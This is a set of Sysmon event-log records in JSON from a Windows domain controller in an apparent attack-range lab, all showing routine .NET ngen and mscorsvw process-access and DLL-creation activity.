{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7923,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.497\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04F2-5F25-0000-0010AC1D1200}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.497","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04F2-5F25-0000-0010AC1D1200}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7924,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04F2-5F25-0000-0010AC1D1200}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04F2-5F25-0000-0010AC1D1200}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7925,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:18.668\r\nProcessGuid: {A837DB8D-04F2-5F25-0000-0010AC1D1200}\r\nProcessId: 2980\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ba4-0\\System.Windows.Forms.DataVisualization.Design.dll\r\nCreationUtcTime: 2020-08-01 06:00:18.668","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:18.668","ProcessGuid":"{A837DB8D-04F2-5F25-0000-0010AC1D1200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ba4-0\\System.Windows.Forms.DataVisualization.Design.dll","CreationUtcTime":"2020-08-01 06:00:18.668","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7926,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.700\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04F2-5F25-0000-0010DF211200}\r\nTargetProcessId: 3908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.700","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04F2-5F25-0000-0010DF211200}","TargetProcessId":"3908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7927,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.700\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04F2-5F25-0000-0010DF211200}\r\nTargetProcessId: 3908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.700","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04F2-5F25-0000-0010DF211200}","TargetProcessId":"3908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7928,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04F2-5F25-0000-0010DF211200}\r\nTargetProcessId: 3908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04F2-5F25-0000-0010DF211200}","TargetProcessId":"3908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7929,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.747\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04F2-5F25-0000-00101C251200}\r\nTargetProcessId: 3252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.747","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04F2-5F25-0000-00101C251200}","TargetProcessId":"3252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7930,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.747\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04F2-5F25-0000-00101C251200}\r\nTargetProcessId: 3252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.747","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04F2-5F25-0000-00101C251200}","TargetProcessId":"3252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7931,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.747\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04F2-5F25-0000-00101C251200}\r\nTargetProcessId: 3252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.747","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04F2-5F25-0000-00101C251200}","TargetProcessId":"3252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
